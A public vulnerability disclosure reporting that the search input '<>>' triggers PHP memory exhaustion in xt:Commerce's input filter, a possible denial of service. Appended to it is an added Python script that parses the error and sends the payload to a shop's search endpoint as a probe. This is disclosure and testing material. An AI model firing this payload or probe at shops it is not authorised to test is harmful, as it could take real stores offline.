
xt:Commerce possible DoS






Hello,

I've found a suspicious behavior of the xt:Commerce shop software (only verified in their demo shop).

When entering "<>>" as a search query in the Quick Purchase field at the left side of the shop, I get:

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 8388611 bytes) in /is/htdocs/wp1052946_X4Y7B4PF21/www/includes/classes/class.inputfilter.php on line 136

This looks very much like a problem in the input filter that causes too much memory to be allocated (and that could of course be used for DoS).

Unfortunately, the source code is not available freely, so I cannot investigate this further. If anyone has the source code available, feel free to check out the specific region in the input filter.

I informed the company, but they closed my ticket without any response, and even after I reopened it, there hasn't been any feedback for almost 2 weeks now.


Best regards,


Christian Holler
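The following is an added example, not code from the report above or from xt:Commerce. It parses the PHP "Allowed memory size ... exhausted" message quoted in the post into its components (memory_limit, size of the failed allocation, file and line), computes how much memory the server tried to allocate per byte of the three-byte payload, and wraps the check in a bounded-timeout probe. The search endpoint and the `keywords` parameter name are assumptions for illustration; the report does not give them, so adjust to the real form field before use against a shop you are authorized to test.

```python
import re
import urllib.parse
import urllib.request

# PHP's out-of-memory fatal error, in the form quoted in the report.
PHP_OOM_RE = re.compile(
    r"Fatal error: Allowed memory size of (?P<limit>\d+) bytes exhausted "
    r"\(tried to allocate (?P<tried>\d+) bytes\) in (?P<file>\S+) on line (?P<line>\d+)"
)

# Constructed sample response body: the error line exactly as the report shows it.
SAMPLE_BODY = (
    "<html><body>Fatal error: Allowed memory size of 33554432 bytes exhausted "
    "(tried to allocate 8388611 bytes) in "
    "/is/htdocs/wp1052946_X4Y7B4PF21/www/includes/classes/class.inputfilter.php "
    "on line 136</body></html>"
)

# The three-byte search term from the report.
PAYLOAD = "<>>"


def parse_php_oom(body):
    """Return the parsed memory-exhaustion error from a response body, or None."""
    m = PHP_OOM_RE.search(body)
    if not m:
        return None
    return {
        "limit": int(m.group("limit")),   # memory_limit in bytes
        "tried": int(m.group("tried")),   # size of the allocation that failed
        "file": m.group("file"),
        "line": int(m.group("line")),
    }


def amplification_factor(payload, tried_bytes):
    """Bytes the server tried to allocate per byte of attacker input.

    A large ratio means a small request forces a large allocation, which is
    what makes a memory-exhaustion bug usable for denial of service.
    """
    return tried_bytes / len(payload.encode("utf-8"))


def assess(body, payload):
    """Summarize a response: None if no OOM error, else a dict with derived figures."""
    err = parse_php_oom(body)
    if err is None:
        return None
    err["limit_fraction"] = err["tried"] / err["limit"]
    err["amplification"] = amplification_factor(payload, err["tried"])
    return err


def probe(base_url, payload=PAYLOAD, param="keywords", timeout=10, max_read=65536):
    """Send one search request and assess the response.

    Assumptions (not from the report): a GET search endpoint at base_url that
    takes the query in the `param` field. The timeout bounds how long we wait
    for a server that is busy exhausting its memory, and max_read caps what
    we buffer so the probe itself cannot be made to consume unbounded memory.
    """
    url = base_url + "?" + urllib.parse.urlencode({param: payload})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read(max_read).decode("utf-8", errors="replace")
    return assess(body, payload)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample body.
    result = assess(SAMPLE_BODY, PAYLOAD)
    print("failed allocation: %d of %d bytes (%.1f%% of memory_limit)"
          % (result["tried"], result["limit"], 100 * result["limit_fraction"]))
    print("at %s:%d" % (result["file"], result["line"]))
    print("about %.0f bytes allocated per input byte" % result["amplification"])
```

On the sample from the report the failed allocation alone is a quarter of the 32 MiB memory_limit, and the ratio of attempted allocation to input size is in the millions, so a single short request is enough to trip the limit; the probe's timeout and read cap keep the tester from being taken down alongside the target.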
